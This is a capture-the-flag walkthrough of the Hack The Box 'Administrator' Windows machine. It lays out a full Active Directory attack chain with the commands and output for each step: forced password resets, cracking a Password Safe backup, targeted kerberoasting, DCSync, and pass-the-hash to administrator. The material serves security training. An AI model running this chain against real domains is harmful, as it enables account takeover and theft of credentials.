Hack The Box / WINDOWS / 2024-11-16
Hack The Box — Administrator (Windows)
AD privilege chain from Olivia through delegated password resets, Password Safe credential recovery from FTP backup, targeted kerberoasting of ethan, and DCSync to administrator hash for final access.
Target
- IP:
10.129.36.59
Machine Information
From the Hack The Box machine description:
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich
Port Scan
sudo nmap -sC -sV 10.129.36.59 -p- -T5 -v
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-10 19:27:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
53460/tcp open msrpc Microsoft Windows RPC
64837/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64842/tcp open msrpc Microsoft Windows RPC
64845/tcp open msrpc Microsoft Windows RPC
64862/tcp open msrpc Microsoft Windows RPC
64895/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1d14h48m14s
| smb2-time:
| date: 2024-11-10T19:28:40
|_ start_date: N/A
Add administrator.htb to /etc/hosts.
Initial AD Enumeration
nxc smb administrator.htb -u Olivia -p ichliebedich --shares
SMB 10.129.36.59 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.36.59 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.129.36.59 445 DC [*] Enumerated shares
SMB 10.129.36.59 445 DC Share Permissions Remark
SMB 10.129.36.59 445 DC ----- ----------- ------
SMB 10.129.36.59 445 DC ADMIN$ Remote Admin
SMB 10.129.36.59 445 DC C$ Default share
SMB 10.129.36.59 445 DC IPC$ READ Remote IPC
SMB 10.129.36.59 445 DC NETLOGON READ Logon server share
SMB 10.129.36.59 445 DC SYSVOL READ Logon server share
enum4linux-ng administrator.htb
We notice:
FQDN: dc.administrator.htb
Add dc.administrator.htb to /etc/hosts.
bloodhound-python -u 'Olivia' -p 'ichliebedich' -ns 10.129.36.59 -d 'administrator.htb' -dc 'dc.administrator.htb' -c All --zip
sudo neo4j console
bloodhound --no-sandbox
Upload the zip into BloodHound.
Mark Olivia as owned.
We notice Olivia has a CanPsRemote relation to dc.administrator.htb.
evil-winrm -i administrator.htb -u 'Olivia' -p 'ichliebedich'
Try FTP:
ftp Olivia@administrator.htb
Enter Olivia's password.
It does not work.
ldapdomaindump administrator.htb -u 'admninistrator.htb\olivia' -p 'ichliebedich'
Open domain_computers.html.
There is only one computer: dc.
AD Abuse Chain: Olivia → michael → benjamin
From BloodHound, we note that Olivia has GenericAll over michael.
Download bloodyad:
- https://github.com/CravateRouge/bloodyAD.git
python3 bloodyAD/bloodyAD.py --host 'dc.administrator.htb' -d administrator.htb --dc-ip administrator.htb -u 'olivia' -p 'ichliebedich' set password 'michael' '!Kali12345678!'
[+] Password changed successfully!
nxc smb administrator.htb -u michael -p '!Kali12345678!'
SMB 10.129.36.59 445 DC [+] administrator.htb\michael:!Kali12345678!
From BloodHound, michael has ForceChangePassword over benjamin.
python3 bloodyAD/bloodyAD.py --host 'dc.administrator.htb' -d administrator.htb --dc-ip administrator.htb -u 'michael' -p '!Kali12345678!' set password 'benjamin' '!Kali12345678!'
nxc smb administrator.htb -u benjamin -p '!Kali12345678!'
SMB 10.129.36.59 445 DC [+] administrator.htb\benjamin:!Kali12345678!
benjamin is a member of group ShareModerators.
FTP Backup and Password Safe
ftp benjamin@administrator.htb
Use password !Kali12345678!.
230 User logged in.
dir
10-05-24 08:13AM 952 Backup.psafe3
get Backup.psafe3
Then, on a shell on our machine:
file Backup.psafe3
Backup.psafe3: Password Safe V3 database
Note also that michael has CanPsRemote to dc.
evil-winrm -i administrator.htb -u 'michael' -p '!Kali12345678!'
Crack Password Safe DB:
pwsafe2john Backup.psafe3 > test.out
john --wordlist=/usr/share/wordlists/rockyou.txt ./test.out
Recovered password:
tekieromucho (Backu)
Open DB:
pwsafe -s Backup.psafe3
Enter recovered password.
We find these credentials:
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Swemily:UXLCI5iETUsIBoFVTj8yQFKoHjXmbemma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Access as emily and Attack ethan
nxc smb administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB 10.129.36.59 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
evil-winrm -i administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
From BloodHound, emily has GenericWrite over ethan.
Attempted password set:
python3 bloodyAD/bloodyAD.py --host 'dc.administrator.htb' -d administrator.htb --dc-ip administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' set password 'ethan' '!Kali12345678!'
This does not work.
Try shadow credentials with PyWhisker:
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
git checkout c4ecf411a585ca4647843c8c3856e023e738a528
cd ..
python3 pywhisker/pywhisker.py -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 9c47ffbd-1730-7379-f7e6-3b55fb562751
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 5QGP2Bz0.pfx
[*] Must be used with password: FLX4fZw0YqeQel1masUr
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx 5QGP2Bz0.pfx -password FLX4fZw0YqeQel1masUr -out "unprotected.pfx"
certipy auth -pfx unprotected.pfx -dc-ip 10.129.36.59 -username 'ethan' -domain 'administrator.htb'
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
So this approach does not work.
Download PKINITtools:
- https://github.com/dirkjanm/PKINITtools.git
python3 PKINITtools/gettgtpkinit.py -cert-pfx 5QGP2Bz0.pfx -pfx-pass 'FLX4fZw0YqeQel1masUr' -dc-ip administrator.htb 'administrator.htb/ethan' out.ccache
Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"
We got the same error.
Targeted Kerberoast and Password Crack
Get shell as emily again:
evil-winrm -i administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Download PowerView and upload to target:
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
. .\PowerView.ps1
Set-DomainObject -Identity ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser ethan -SPN | Get-DomainSPNTicket -Format Hashcat
This does not work.
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
sudo ntpdate administrator.htb
python3 targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5b038ca9e3deb262cfb2d49e4e7fb6dc$ae83e5f5e60c82bafc727780d6e19ac2c4969d906205a62fa6f31cc87a4cc72a064887369aca9483cbcb39bb22da1056840218704bed9162798657b1acc872058c13c7eb83ffe3ea195f9571e30dae21c49799c93755c690975ebc9aa49f665cdf0b96f7734325a2333122937913a69620f4e1967a8633a15b974efe4498c0fff2a33566860cc3d11783dfe25bfb9e58e6394bdb609b2e9cafb1cfdc1c3fd379153f9b66eae11643738482cf99a14023882f0fee08a27dba2bdf046f2ef34944de2f4eb9f3f4c941d5f19adf3589d6e6a944cc20f7b3decb101507a5638091cd09da0cfc543a098153fe642aec78de0970a8badc8514a9ecacd441d1c7e80c5a5e907b65c0886debf351d889b4e84c3813b4eeff5a39cc7a5510ce63bc420e8561dcb91d4024160faa4784a7cd9c6c790baf817dd907448565aaca6f54ab555c0945ce76410c0c325be2339f6c69d8567d0a1a4458b854171c86b0ea5732d6c4471e1eb6772baa590ede98b7498f57155be7a41bf356ea112d0a8d4bc901f97757ea0dec9877801abf998d39db43daf1916b1e6b4e0293459330c678f26efd457581fa62fa6b36267d5fb652ae27d2ce1adc22757bc1d33cf2a075fda6ad2383d34f69c316b6458ac8b4c76c20be39fc22d7cfecfbcdb03edf6e2315b29d39cecba1e5771f8989c17119d2da576e057a375a749d3bf38cbdc4872660f3eee1e7316d54d16eef3d9f83e03243d78bb15d25e0001e008cfa6ad6e531eb787d72485571ace593e5a5c998150bdf75e6198ae9af134919fa074cf800d4e1bd588f194fcd64278359ec9a42c9fbb8ba7b4e55ecff069174882b64a7648d332d2e52bc35c6371ecf42ddd2a25dd933ce73a6fc65614bb1b83cfb80eeebdb3b52ecfee944f0d50abf90e72acc7ee375993a3f8bf42ba2c10ddcbbedc01f37ea3756b62334e84280539ef299c6fb183141154328b10a99652fda185802f3cfd9f6444771c1b86c28208a9a59bd02067e3b3cb4ceb511a1bc5fe14b2eafd2a6bfd21266a1eafbf19c399ba6f982d0721722dbfddcf92ccf9b8c2f685ae72667194560e5f707ccf83e60503811a787a7df4b22038a9cdf6ee37820479c7115bbb37ae3aa34d217e96819e9ab89f33a1cc719a45d6f5f3d32b0ab597d0baa103734aaf9303fe098fcd32640d08cc4a0ed0d41d4dd7f8021c9d71a3baf36726875851affb0b101ea47b9315e3ee7c84b0a82cfdf1aaafb5a69b4b4f71b9f14ce16107447632149f7501085e10a01560cc75df20ec9b13d6d19bd8bda68887d0d6cef7c68b6c20b0a7e08c3425413a41995eed18acea27be44db3a6e4d2f7285eebb3f0f414678c8c1226bc22f114d962ccffb5cb76eac2ab5bba0797b7e88f613a364437ad1f7fb2654292b2d12f0feff48a8ca1019e6af76a0a722978c89bdcfd0bae5d5c478e81a4ccf89b4713baa053782d0f045112747a2afae1d9da62cdd19013d524728888f619bb58258cb273946842f1c813f4db569302da99e0be6f9fda6c3f20
Put it in file hash and crack it:
hashcat -a 0 ./hash ./rockyou.txt
Recovered password:
limpbizkit
nxc smb administrator.htb -u ethan -p limpbizkit
SMB 10.129.36.59 445 DC [+] administrator.htb\ethan:limpbizkit
From BloodHound, ethan has DCSync over administrator.htb.
secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'dc.administrator.htb'
We obtain:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Final access:
evil-winrm -i administrator.htb -u administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
We get a shell as administrator.